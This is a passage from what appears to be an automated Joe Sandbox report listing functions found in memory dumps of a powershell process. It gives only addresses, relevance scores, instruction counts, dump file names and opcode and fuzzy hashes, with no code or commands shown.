                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 62f2c25992cd80aaf550704aa5a01de65318cacb5f1e5ce44b25cc7b2acaf2ef
                                                                                                                                            • Instruction ID: f59a9f709201d99aed058236f71631a3fa6246bfd5dded3b34499ac28ced7123
                                                                                                                                            • Opcode Fuzzy Hash: 62f2c25992cd80aaf550704aa5a01de65318cacb5f1e5ce44b25cc7b2acaf2ef
                                                                                                                                            • Instruction Fuzzy Hash: DF726BB4A00325DFDB24DB54C950BAAF7B2AF85304F14C49AD90A6BB44DB71ED82CF61
                                                                                                                                            Function 07D2744F Relevance: .6, Instructions: 646COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 35ef9dce3694d287e49b97fb0bca7857a99f00e1443a566cce68c79a26da72a0
                                                                                                                                            • Instruction ID: ecada395f08a98cda9b813f4963ea65b5e4184a074299f541c10c51e541c036f
                                                                                                                                            • Opcode Fuzzy Hash: 35ef9dce3694d287e49b97fb0bca7857a99f00e1443a566cce68c79a26da72a0
                                                                                                                                            • Instruction Fuzzy Hash: 545281B4A00725DFEB24DB54C950B9AF7B2AF85304F10C49AD94A6BB40DB71ED82CF61
                                                                                                                                            Function 07D2D482 Relevance: .6, Instructions: 624COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 627eaa015b0e9ece608a91093d424372949327a27595a5d3ec4ec202bb815920
                                                                                                                                            • Instruction ID: 422c14970b397a88e28a666d15d0c266992b8345773a1aab71f2fae3338d6e69
                                                                                                                                            • Opcode Fuzzy Hash: 627eaa015b0e9ece608a91093d424372949327a27595a5d3ec4ec202bb815920
                                                                                                                                            • Instruction Fuzzy Hash: C742B4B4B00315DFE724DB94C850B9AB7B2AF85304F1085A9D80A6F745DB72ED82CF61
                                                                                                                                            Function 07D280D8 Relevance: .5, Instructions: 544COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: abb5d27cf0bfa9c1d1339e91b71aa971412ab42564a91449b48b32e2a9755302
                                                                                                                                            • Instruction ID: 3ec89950c5111df5b6c87118ee3e18a6055e315af1a915e0336cced98147e265
                                                                                                                                            • Opcode Fuzzy Hash: abb5d27cf0bfa9c1d1339e91b71aa971412ab42564a91449b48b32e2a9755302
                                                                                                                                            • Instruction Fuzzy Hash: 18227CB4B00214EFD714DB98D540F9AB7B2EF88709F148069E905AF791DB72EC82DB91
                                                                                                                                            Function 09A91230 Relevance: .5, Instructions: 518COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 090c6077753a60c5880c8e443f5cbb340fc6b6d9b7c5a51c159319e8b7b732d7
                                                                                                                                            • Instruction ID: c994ef4df743cfd650e5544c54599b2743e19ff8830db350829bec8182d4dd27
                                                                                                                                            • Opcode Fuzzy Hash: 090c6077753a60c5880c8e443f5cbb340fc6b6d9b7c5a51c159319e8b7b732d7
                                                                                                                                            • Instruction Fuzzy Hash: 7302E171B14206CFDB14DBA8C440BAAB7F6FF89B14F15806AE805AB751DB35DC41CBA1
                                                                                                                                            Function 07D2D714 Relevance: .4, Instructions: 435COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4ba87922362738417e8b6f4f7e14f2968780b11af6c162a11d7f10c9362ecc0a
                                                                                                                                            • Instruction ID: 405c63bee0d71e1472e70b70f7a09a7dada2eee3af282b211d6f75f5ace2711e
                                                                                                                                            • Opcode Fuzzy Hash: 4ba87922362738417e8b6f4f7e14f2968780b11af6c162a11d7f10c9362ecc0a
                                                                                                                                            • Instruction Fuzzy Hash: A7123DB0A04226DFEB20DB14C950BA9F7B2AF55308F1084E9D949BB740DB71ED82DF61
                                                                                                                                            Function 07D2D509 Relevance: .4, Instructions: 431COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: acece4fca93645cfb67d2cabe7fd16ea6824a9d39643841775da08047c87e0ea
                                                                                                                                            • Instruction ID: 7caebd3416c22d8f47c2414bfac14188ad31900104fcd4bc126ecc3140ad69a8
                                                                                                                                            • Opcode Fuzzy Hash: acece4fca93645cfb67d2cabe7fd16ea6824a9d39643841775da08047c87e0ea
                                                                                                                                            • Instruction Fuzzy Hash: FC122CB4B00226DFEB24DB14C950BA9F7B2AB55308F1084E9D949BB740DB71ED82DF61
                                                                                                                                            Function 09A82428 Relevance: .4, Instructions: 424COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a2e5bec813482c4b8a9b6d7b63761c5b1a29f9e0feca775c3505f2e009b54266
                                                                                                                                            • Instruction ID: 7b38b8b34da5797395dc6bfeb2392b0cc1e78636e8e630fee15cb76ff3417dc5
                                                                                                                                            • Opcode Fuzzy Hash: a2e5bec813482c4b8a9b6d7b63761c5b1a29f9e0feca775c3505f2e009b54266
                                                                                                                                            • Instruction Fuzzy Hash: 06024974A012099FDB05DF98C884BAEBBF6FF88750F248159E815AB365C735ED81CB90
                                                                                                                                            Function 09A81E68 Relevance: .4, Instructions: 424COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5e24b92434d698ae15a8fdffd392718fa0aeedf24b6665235d124ab33afc1020
                                                                                                                                            • Instruction ID: 7c0189804d7cea6ec69b62911d15840ec4abda6c55273dc40c6ce9814f8846f5
                                                                                                                                            • Opcode Fuzzy Hash: 5e24b92434d698ae15a8fdffd392718fa0aeedf24b6665235d124ab33afc1020
                                                                                                                                            • Instruction Fuzzy Hash: 8D023C74A00209DFDB05DF98D884AAEBBF6FF88750F258169E815AB365C731ED41CB90
                                                                                                                                            Function 07D280B9 Relevance: .4, Instructions: 392COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8084dbbae480942a0c45fc2fb5c2ae64492197b8b10a2b5b8d429c82ac504fdd
                                                                                                                                            • Instruction ID: d9e44b4e8746de74b3e5dbd91f47958a88d69d2fea6fddeb5e92e8e44cd82683
                                                                                                                                            • Opcode Fuzzy Hash: 8084dbbae480942a0c45fc2fb5c2ae64492197b8b10a2b5b8d429c82ac504fdd
                                                                                                                                            • Instruction Fuzzy Hash: 3DF16BB4A00254EFDB14CB58C540F9ABBB2FF88709F158059E905AF791DB72EC82DB51
                                                                                                                                            Function 09A80B80 Relevance: .4, Instructions: 392COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8dfb48ca69b130e96187ca6247cf17af1c42695701cfcc4bfc66564c409170bc
                                                                                                                                            • Instruction ID: a2c85ac0fd3bdc3b42c5fd7562f407ff4d15ea7ee3ee419c946cde56d1134e9a
                                                                                                                                            • Opcode Fuzzy Hash: 8dfb48ca69b130e96187ca6247cf17af1c42695701cfcc4bfc66564c409170bc
                                                                                                                                            • Instruction Fuzzy Hash: 95F18E71A01258DFDB05DFA8C894ADEBBB2FF89710F158199E804AB361C735ED85CB90
                                                                                                                                            Function 07D24548 Relevance: .4, Instructions: 382COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 927f5993c722d5d63fdef25aff49d35ab3dd4175b276d8bbeb8b4421f0338e0a
                                                                                                                                            • Instruction ID: 6d4755add6d13e9ae659496f42eb2f0b157c04b1672103357e884530bdeb026a
                                                                                                                                            • Opcode Fuzzy Hash: 927f5993c722d5d63fdef25aff49d35ab3dd4175b276d8bbeb8b4421f0338e0a
                                                                                                                                            • Instruction Fuzzy Hash: 51E19AB0B002559FDB54DB98C440BAAB7B2EF89708F15C069E805AF751DB72EC43CB91
                                                                                                                                            Function 07D2452E Relevance: .3, Instructions: 337COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ff35d61e4cb8140a23f81cb75336ae4fa22d4879dd25c58d167beda81e5da04a
                                                                                                                                            • Instruction ID: 8df1c69aa6b610f4052b59a76854335eafd314ff25ec560f5a0292bc967183b1
                                                                                                                                            • Opcode Fuzzy Hash: ff35d61e4cb8140a23f81cb75336ae4fa22d4879dd25c58d167beda81e5da04a
                                                                                                                                            • Instruction Fuzzy Hash: 2AD168B0A012959FDB14CB58C540FAAFBB2EF94718F158059E815AF751CB72EC83CB91
                                                                                                                                            Function 04DC72A0 Relevance: .3, Instructions: 313COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 39a30a6c871374b10215b047db63b6caaa350a07d8f604794c03b9869e522020
                                                                                                                                            • Instruction ID: 5bafad14ecebeb263bb1b3adfd5ddb991833382e4a44ac62d01032388233850d
                                                                                                                                            • Opcode Fuzzy Hash: 39a30a6c871374b10215b047db63b6caaa350a07d8f604794c03b9869e522020
                                                                                                                                            • Instruction Fuzzy Hash: 2EC17B35A0030ADFCB14DFA5D948AADBBB2FF84710F158569E406AB364DB34AD49CF80
                                                                                                                                            Function 09A806FD Relevance: .2, Instructions: 247COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7353442caadd232c963779a5e54a9899d0490296128f5309ba2f279553314d56
                                                                                                                                            • Instruction ID: ec7943b2338404e747b9d4826c7d295a658ee25e76669e435df5ed22a4111ff8
                                                                                                                                            • Opcode Fuzzy Hash: 7353442caadd232c963779a5e54a9899d0490296128f5309ba2f279553314d56
                                                                                                                                            • Instruction Fuzzy Hash: 1391E831A093958FD706DB78C8606DE7FB1AF86610B1940DBC441DF263DB388D0ACBA6
                                                                                                                                            Function 09A807C8 Relevance: .2, Instructions: 221COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b454990c94f02c85133a6a3c312a819875cdfd896e83f15177e154aa3925f4ee
                                                                                                                                            • Instruction ID: 52463ca7da813585c89a705c47eaa34af4b392f4dedaf21ac9e65f20727942af
                                                                                                                                            • Opcode Fuzzy Hash: b454990c94f02c85133a6a3c312a819875cdfd896e83f15177e154aa3925f4ee
                                                                                                                                            • Instruction Fuzzy Hash: FD819D35B002198FDB15EFA9C880AAFB7B6FFC8710F148569E8059B355DB349C46CBA1
                                                                                                                                            Function 04DC2AA0 Relevance: .2, Instructions: 217COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 57986c9b6df84fdcbd4c031f466d95703f9a581cf4d43c7135f36b0526d8f26d
                                                                                                                                            • Instruction ID: ef9e67f2298b6969acb7a56f687de2833df9850abecb779be93947eaaa7ad2b2
                                                                                                                                            • Opcode Fuzzy Hash: 57986c9b6df84fdcbd4c031f466d95703f9a581cf4d43c7135f36b0526d8f26d
                                                                                                                                            • Instruction Fuzzy Hash: 78917F74A0024A8FCB15CF58C594AAEFBB2FF89310B248599D815AB3A5C735FC51CBA0
                                                                                                                                            Function 09A91590 Relevance: .2, Instructions: 201COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 85c0578668cc9134c3f158d203bfddd68f0650d9061a0896a5fcb622381dbb51
                                                                                                                                            • Instruction ID: c121edc6622ea88ac60bb0ff639485664eda695bcb9afd610764df92ed87c0c9
                                                                                                                                            • Opcode Fuzzy Hash: 85c0578668cc9134c3f158d203bfddd68f0650d9061a0896a5fcb622381dbb51
                                                                                                                                            • Instruction Fuzzy Hash: D1814874A14205DFDB14CF88C584EAAB7F2BF88714F19C059E905AB755CB36E881CFA0
                                                                                                                                            Function 04DC7A68 Relevance: .2, Instructions: 190COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 41aee4a8acd99ac7b82de66c93269c66b35f8a245eecaf89c3e36e78317b83fa
                                                                                                                                            • Instruction ID: 70610b8edcece1ed2b00e008afffeb536632851425c5d138121b5e09eeefffed
                                                                                                                                            • Opcode Fuzzy Hash: 41aee4a8acd99ac7b82de66c93269c66b35f8a245eecaf89c3e36e78317b83fa
                                                                                                                                            • Instruction Fuzzy Hash: 33718A31A0020ADFDB14DF68C884A9EBBF6FF89354F14856ED415AB651DB70AC46CF90
                                                                                                                                            Function 04DC7BD6 Relevance: .2, Instructions: 188COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 60915a1f5b1e44c7eccbc099b460acf65aec87405893a905258b802fc8b284c2
                                                                                                                                            • Instruction ID: 4e044bd515ef31c41499e4ffbb0fdc8316e2cfa69a38471d58989a971ad528e8
                                                                                                                                            • Opcode Fuzzy Hash: 60915a1f5b1e44c7eccbc099b460acf65aec87405893a905258b802fc8b284c2
                                                                                                                                            • Instruction Fuzzy Hash: 1A713A30A0020ADFDB19DFA5D884AADBBF2BF88344F14842DD412AB764DB74AD46CF50
                                                                                                                                            Function 04DCD627 Relevance: .2, Instructions: 159COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fd067570ce6ddc3579154f075aeab8d675b19b2da40d583862b3ab6d3ee70e7b
                                                                                                                                            • Instruction ID: 0feb082d303206b428f6c29b24883f7726924fdaa8b1c0a75ca19ea691f10c39
                                                                                                                                            • Opcode Fuzzy Hash: fd067570ce6ddc3579154f075aeab8d675b19b2da40d583862b3ab6d3ee70e7b
                                                                                                                                            • Instruction Fuzzy Hash: 58518134A013448FDB05DF79C8547AEBBF6AFCA210F19846AD846AF396CF349C458B64
                                                                                                                                            Function 09A82B5C Relevance: .1, Instructions: 135COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 127cbe24f5a8abd17fb9765ded67577b260fc3c4a95eb49c048fab51f78e8b90
                                                                                                                                            • Instruction ID: daab3e5a1aaf69186932b03236bbd8d6e0491930fc14fe5b6d10e5edc9b7abaf
                                                                                                                                            • Opcode Fuzzy Hash: 127cbe24f5a8abd17fb9765ded67577b260fc3c4a95eb49c048fab51f78e8b90
                                                                                                                                            • Instruction Fuzzy Hash: 0C41616291E3E05FE703AB389CB06D53F70AE87518B1A01C7C091CF1A3E619995DC7AB
                                                                                                                                            Function 09A91C5F Relevance: .1, Instructions: 131COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032543720.0000000009A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A90000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a90000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d8f168c333ae682844a5c392d54a29c1706a8185542a3319c1d47a2522d3cf74
                                                                                                                                            • Instruction ID: 24780fe3167be9ddb55b2e8185aa257db9277761d2c8148594bd6685b4883ada
                                                                                                                                            • Opcode Fuzzy Hash: d8f168c333ae682844a5c392d54a29c1706a8185542a3319c1d47a2522d3cf74
                                                                                                                                            • Instruction Fuzzy Hash: 65418B31A1820ADFCF248F48C541BA9B7F5FB88B60F19886AF815AB650C731DD41CBA0
                                                                                                                                            Function 09A829E0 Relevance: .1, Instructions: 127COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: aa93d351064ad047f6808c78af694d9260991e5c44bd91e6c6c7f67f756ff684
                                                                                                                                            • Instruction ID: 3e8bfcd853738d74277c6e32c20dea2b79535d16a90cc5880c34a5b2eabac53a
                                                                                                                                            • Opcode Fuzzy Hash: aa93d351064ad047f6808c78af694d9260991e5c44bd91e6c6c7f67f756ff684
                                                                                                                                            • Instruction Fuzzy Hash: 63514230A0160A9FCB15DF99C894ABEF7B6FF88310B248659E925EB394C735EC51CB50
                                                                                                                                            Function 09A829D0 Relevance: .1, Instructions: 125COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2032521127.0000000009A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_9a80000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9f188ad8eb44d97b23e8db9e69f6be715b5f865e74bdfb23176734303eedf6f3
                                                                                                                                            • Instruction ID: 9b435058616ea85de14936d21c5f163a4be5aa3d44d3a8c046834157684aef39
                                                                                                                                            • Opcode Fuzzy Hash: 9f188ad8eb44d97b23e8db9e69f6be715b5f865e74bdfb23176734303eedf6f3
                                                                                                                                            • Instruction Fuzzy Hash: 99513070A0160A9FCB15DF98C995ABEF7B6FF88310B248658D925EB394C335EC51CB50
                                                                                                                                            Function 07D23E00 Relevance: .1, Instructions: 124COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2023843153.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_7d20000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ef540633efb0d182d7e390a72bdda350054a233ea9826f62df47cd418383abb4
                                                                                                                                            • Instruction ID: 5296536629991dde11aaf109d14dccc9815cc9625287964fd4db0bbb892eedc9
                                                                                                                                            • Opcode Fuzzy Hash: ef540633efb0d182d7e390a72bdda350054a233ea9826f62df47cd418383abb4
                                                                                                                                            • Instruction Fuzzy Hash: 95414CB1B002369FCB249BA998006AAF7B5EFD4614B14852ACD05EB244DB35D907C7E1
                                                                                                                                            Function 04DC7A53 Relevance: .1, Instructions: 120COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c514b0191714fc1cdcc0d67883c29b2d36292a1d25c222b52c4c36bb70a8d679
                                                                                                                                            • Instruction ID: bbbc0c4d5beb9556b60f42ae29a275b42f84663bc2ad5606bf287431014e1164
                                                                                                                                            • Opcode Fuzzy Hash: c514b0191714fc1cdcc0d67883c29b2d36292a1d25c222b52c4c36bb70a8d679
                                                                                                                                            • Instruction Fuzzy Hash: 80415B71A0020ADFDB18EFA9C8446AEBBF2BF84340F14856DD015AB795DB74AC45CF91
                                                                                                                                            Function 04DCD680 Relevance: .1, Instructions: 119COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.2011445193.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_4dc0000_powershell.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c645074b418bc37bf1aebabb3cf6bc466274a7c537e5131120ec1df83db80149
                                                                                                                                            • Instruction ID: 368f14ebbd26ace22066aebbe6359dc4a46ae7f3614da93338b0cafcc45e2948
                                                                                                                                            • Opcode Fuzzy Hash: c645074b418bc37bf1aebabb3cf6bc466274a7c537e5131120ec1df83db80149
                                                                                                                                            • Instruction Fuzzy Hash: 13414C34A002089FDB04EF7AC8547AEB6F7AFC8650F188469D806AB795DF359C418BA4
                                                                                                                                            Function 09A80E87 Relevance: .1, Instructions: 117COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
